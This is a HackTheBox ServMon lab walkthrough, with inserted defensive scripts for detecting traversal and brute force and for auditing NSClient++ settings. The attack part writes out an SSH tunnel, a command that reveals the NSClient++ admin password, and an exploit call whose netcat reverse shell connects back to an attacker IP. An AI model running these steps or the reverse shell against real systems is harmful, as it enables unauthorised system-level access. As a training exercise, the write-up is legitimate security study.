ServMon HackTheBox Walkthrough
Hello guys, ServMon from HackTheBox is getting retired today, so I am now allowed to release a walkthrough on it, and I am going to show you how I solved the box. The box has an IP address of 10.10.10.184 and was rated as an easy box, but I would bump it up to medium because the root exploit was a little bit hard to perform; apart from that, the box really wasn't that difficult to exploit. The author of the box did a nice job and made sure you didn't have to think too hard to get the answers you needed. You start off with an FTP server that has anonymous authentication enabled, and from the FTP directories you get some files that tell you a user left credentials in their Desktop folder. A web application called NVMS-1000 has a local file inclusion vulnerability, which you leverage to extract those credentials from the box; you then perform an SSH and SMB bruteforce attack with them and get a shell on the box. USER DONE!!!! For root you have to set up an SSH tunnel to a port running NSClient++ that is only exposed locally and exploit a privilege escalation vulnerability in that web application to get root on the box. Without much more to say, let's jump in.
As always, we are going to start off with an nmap scan; this will give us a pretty good idea of the services that are running on the box.
Looking at the results, we have a bunch of ports open.
I'm going to start by enumerating FTP, since anonymous login is allowed. After logging into FTP we get two usernames:
- Nadine
- Nathan
So we already have potential usernames.
Looking at Nadine's home directory we get a file called Confidential.txt, which I downloaded to my box.
Looking at Nathan's FTP directory we get another file called Notes to do.txt, which I also downloaded to my box.
After downloading both files I logged out of FTP and took a look at them.
Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
Notes to do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Confidential.txt tells us that a password file has been left on Nathan's Desktop, and Notes to do.txt tells us the tasks that need to be completed.
Since there was nothing more to enumerate from FTP, I decided to enumerate SMB and check whether guest authentication was enabled on the shares.
Sadly I got an authentication error: guest authentication is not allowed.
I moved on to enumerate HTTP, which is running on port 80.
On opening the webpage we get the homepage of a web application called NVMS-1000.
I checked whether common files like robots.txt, which exists on almost every website, were available, but the page was blank.
The next best thing to do is to run Gobuster, a directory/file and DNS busting tool written in Go. Gobuster is used to brute-force URIs, including directories and files, as well as DNS subdomains.
While Gobuster was running I checked whether the web application had an exploit in Exploit Database and found it had a directory traversal vulnerability.
I copied the exploit to my working directory using the -m (mirror) option of searchsploit.
Taking a look at it, we see that the vulnerability is triggered through the URL path.
So I intercepted the request with Burp Suite and played with it, since we were told that a Passwords.txt file had been left in Nathan's Desktop folder.
After some time I was able to extract the contents of Passwords.txt from Nathan's Desktop folder.
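To make clear what a directory traversal bug like the one above actually is on the server side, and how a defender would both fix it and spot attempts in web logs, here is an added example. It is not code from this walkthrough or from NVMS-1000: it shows a naive path-join file handler of the kind that produces the bug, a hardened version that resolves the path and checks containment before serving anything, and a small check over constructed access-log lines. The web root, file names and log lines are all made up for the example.

```python
import os
from pathlib import Path
from urllib.parse import unquote

# Added example; not NVMS-1000 code. Paths and log lines below are constructed.


def vulnerable_resolve(webroot: str, requested: str) -> str:
    """Naive join: '..' segments in the request walk out of the web root."""
    return os.path.join(webroot, requested)


def hardened_resolve(webroot: str, requested: str):
    """Return the real on-disk path only if it stays inside webroot, else None."""
    root = Path(webroot).resolve()
    # Normalise Windows separators, treat every request as relative to the
    # root, then collapse '..' and symlinks BEFORE the containment check.
    relative = requested.replace("\\", "/").lstrip("/")
    candidate = (root / relative).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        return None          # escaped the web root: refuse to serve
    return str(candidate)


# Constructed access-log lines (combined-log style); 10.10.15.23 is made up.
SAMPLE_LOG = [
    '10.10.15.23 - - [11/Apr/2020:10:00:01 +0000] "GET /Pages/login.htm HTTP/1.1" 200 1234',
    '10.10.15.23 - - [11/Apr/2020:10:00:07 +0000] "GET /../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 152',
    '10.10.15.23 - - [11/Apr/2020:10:00:09 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 152',
    '10.10.14.5 - - [11/Apr/2020:10:01:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4096',
]


def flag_traversal_requests(log_lines):
    """Return (client, raw_path) for lines whose decoded path has a '..' segment.

    The path is URL-decoded twice so that %2e%2e and double-encoded %252e%252e
    are both caught, and backslashes are treated as separators as on Windows.
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue                      # not a request line we understand
        client, raw_path = parts[0], parts[6]
        decoded = unquote(unquote(raw_path))
        segments = decoded.replace("\\", "/").split("/")
        if ".." in segments:
            hits.append((client, raw_path))
    return hits


if __name__ == "__main__":
    bad = "../../../Users/Nathan/Desktop/Passwords.txt"
    print("naive   :", vulnerable_resolve("/srv/www/html", bad))
    print("hardened:", hardened_resolve("/srv/www/html", bad))
    print("hardened:", hardened_resolve("/srv/www/html", "/Pages/login.htm"))
    for client, path in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt from", client, "->", path)
```

The hardened function is the important part: it is not enough to strip `../` from the request string, because encoded and mixed-separator variants get past string filters; resolving the final path and checking that it is still under the web root is what closes the hole. The log check is the complementary detective control.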
Now that we have potential passwords, why don't we brute-force SSH with hydra, since the port scan showed that secure shell (SSH) was listening on port 22?
After some time we got a valid credential using hydra.
I ran crackmapexec, which brute-forces SMB, to double-check hydra's results, and voila, we certainly had a valid credential.
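The hydra and crackmapexec runs above are exactly the pattern a defender wants to catch: a burst of failed logins from one source for a couple of usernames, followed by a success. As an added example that is not part of the walkthrough, here is a small detector over constructed sshd-style log lines (the timestamps, usernames and the 10.10.15.23 source are made up for the example). It keeps a sliding window of failures per source, alerts when the count reaches a threshold, and separately alerts when a success arrives on the heels of failures, which is the signature of a guessed password.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example; constructed sshd-style lines, not real logs from the box.
SAMPLE_AUTH_LOG = [
    "2020-04-11 10:02:01 Failed password for nathan from 10.10.15.23 port 50120 ssh2",
    "2020-04-11 10:02:03 Failed password for nadine from 10.10.15.23 port 50121 ssh2",
    "2020-04-11 10:02:05 Failed password for nathan from 10.10.15.23 port 50122 ssh2",
    "2020-04-11 10:02:07 Failed password for nadine from 10.10.15.23 port 50123 ssh2",
    "2020-04-11 10:02:09 Failed password for nathan from 10.10.15.23 port 50124 ssh2",
    "2020-04-11 10:02:11 Failed password for nadine from 10.10.15.23 port 50125 ssh2",
    "2020-04-11 10:02:12 Accepted password for nadine from 10.10.15.23 port 50131 ssh2",
    "2020-04-11 10:05:00 Failed password for nadine from 10.10.14.5 port 40001 ssh2",
]

LINE_RE = re.compile(
    r"^(\S+ \S+) (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port"
)


def parse_line(line):
    """Return (timestamp, outcome, user, source) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)


def detect_brute_force(lines, threshold=5, window_s=60):
    """Sliding-window failure counter per source address.

    Emits ("THRESHOLD", source, count) once per source when failures inside
    the window reach `threshold`, and ("SUCCESS_AFTER_FAILURES", source, user,
    count) when a login succeeds while recent failures are still in the window.
    """
    failures = defaultdict(deque)   # source -> timestamps of recent failures
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, outcome, user, src = parsed
        window = failures[src]
        # Drop failures that have aged out of the window.
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if outcome == "Failed":
            window.append(ts)
            if len(window) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append(("THRESHOLD", src, len(window)))
        else:  # Accepted
            if window:
                alerts.append(("SUCCESS_AFTER_FAILURES", src, user, len(window)))
                window.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(SAMPLE_AUTH_LOG):
        print(alert)
```

On the constructed input this fires twice: a threshold alert at the fifth failure from 10.10.15.23, and a success-after-failures alert for nadine. The second alert is the more valuable one in practice, because a threshold alone also fires on a user who simply mistypes their password a few times.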
Now that we have a valid credential, let's log in to the box via SSH.
Looking at Nadine's Desktop folder we have the user flag.
Now it's time for privilege escalation. Notes to do.txt talked about NSClient++.
So I googled whether the web application had any vulnerabilities and voila, I found a couple of privilege escalation exploits.
We find privilege escalation exploits and an authenticated remote code execution exploit (which wasn't available when I did the box the first time). I'll be going through the privilege escalation using the Python script: the web application has many bugs, so manual exploitation sometimes works and sometimes doesn't. When I did the box initially there was no Python exploit script, so I did it all manually.
To exploit the web application we need to port-forward the NSClient++ port, since it is only exposed on localhost. Because SSH is enabled this is easy: we can use SSH tunneling; otherwise we could have used chisel to do the port forwarding.
NSClient++ listens on port 8443, which is only open on localhost, so port forwarding gives us access to that port from our local box.
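Binding NSClient++ to localhost only, as the "Lock down the NSClient Access" note describes, stops remote clients but not a local account like nadine's: once any local user has SSH access, a tunnel makes the requests arrive from 127.0.0.1 anyway. What actually makes the privilege escalation possible is the combination of settings in nsclient.ini. As an added example that is not part of the walkthrough or of NSClient++ itself, here is a small audit script over a constructed nsclient.ini. The section and key names (`/modules`, `/settings/default`, `/settings/external scripts`, `allowed hosts`, `allow arguments`, `allow nasty characters`) follow the NSClient++ documentation; the values and the password placeholder are made up.

```python
import configparser
import ipaddress

# Added example; the two ini fragments below are constructed, not the box's
# real configuration. Section/key names follow the NSClient++ docs.
WEAK_INI = """
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = REPLACE_WITH_REAL_PASSWORD

[/settings/external scripts]
allow arguments = true
allow nasty characters = true

[/settings/WEB/server]
port = 8443s
"""

HARDENED_INI = """
[/modules]
CheckExternalScripts = disabled
Scheduler = disabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = REPLACE_WITH_REAL_PASSWORD

[/settings/external scripts]
allow arguments = false
allow nasty characters = false

[/settings/WEB/server]
port = 8443s
"""


def parse_nsclient_ini(text):
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def _enabled(cfg, section, key):
    value = cfg.get(section, key, fallback="disabled").strip().lower()
    return value in ("enabled", "true", "1")


def audit_nsclient(cfg):
    """Return (finding_id, message) pairs for risky settings."""
    findings = []
    if _enabled(cfg, "/modules", "CheckExternalScripts") and _enabled(cfg, "/modules", "Scheduler"):
        findings.append(("SCHED_EXTSCRIPTS",
                         "CheckExternalScripts and Scheduler both enabled: anyone with the web "
                         "admin password can schedule commands that run as the service account"))
    if _enabled(cfg, "/settings/external scripts", "allow arguments"):
        findings.append(("ALLOW_ARGS", "allow arguments = true: callers control script arguments"))
    if _enabled(cfg, "/settings/external scripts", "allow nasty characters"):
        findings.append(("NASTY_CHARS", "allow nasty characters = true: shell metacharacters accepted"))
    hosts = cfg.get("/settings/default", "allowed hosts", fallback="")
    for entry in (h.strip() for h in hosts.split(",") if h.strip()):
        try:
            net = ipaddress.ip_network(entry, strict=False)
            is_local = net[0].is_loopback and net[-1].is_loopback
        except ValueError:
            is_local = False          # hostnames and wildcards are treated as remote
        if not is_local:
            findings.append(("REMOTE_ALLOWED_HOSTS", f"allowed hosts includes non-loopback entry {entry}"))
    if cfg.get("/settings/default", "password", fallback=""):
        findings.append(("PASSWORD_IN_INI",
                         "web password is stored in nsclient.ini: restrict the file's ACL to "
                         "administrators, since a low-privileged local user who can read it "
                         "gets full access through a localhost tunnel"))
    return findings


def finding_ids(text):
    return [fid for fid, _ in audit_nsclient(parse_nsclient_ini(text))]


if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"--- {name} ---")
        for fid, msg in audit_nsclient(parse_nsclient_ini(text)):
            print(f"{fid}: {msg}")
```

The weak fragment mirrors the state the box is in: access is locked to loopback, but external scripts plus the scheduler are on, so the admin password alone is enough to run commands as the service. The hardened fragment leaves only the unavoidable finding, that the password lives in the ini file, which is why the file's permissions matter.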
I did the port forwarding with the command below:
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
This opens up port 8443 on our box and exposes the service running on ServMon through the tunnel.
To confirm that the port forwarding was successful I opened the web application in Mozilla Firefox, and as seen below the port was forwarded correctly.
The next thing we need is the administrator's password for the web application, which you can get using the command below:
./nscp web -- password --display
I saved the script to my working directory, and when I executed it, it gave me a help menu.
The command injection in the Python script is blind, meaning we don't get any output on the screen, so I will set up a tcpdump listener and see if we get a callback when we make the box ping us.
Seeing the output below, we get a callback.
The next thing we will do is get a shell as administrator using a netcat shell (I tried nishang but it seems to be blocked by antivirus).
I copied netcat (nc.exe) to the box's C:\Temp directory.
Then I used the Python exploit to gain root on the box with the command below:
python privesc.py -t 127.0.0.1 -P 8443 -p "ew2x6SsGTxjRwXOT" -c "c:\temp\nc.exe 10.10.15.23 9001 -e cmd"
I set up a listener on my box
and executed the script as seen below.
Going back to my netcat listener, we have a shell as
nt authority\system
Now it's time to get root.txt.
Going to the Administrator's Desktop we get root.txt.
That's it for now guys, till next time, take care.
And if you liked the walkthrough you can clap for me down below.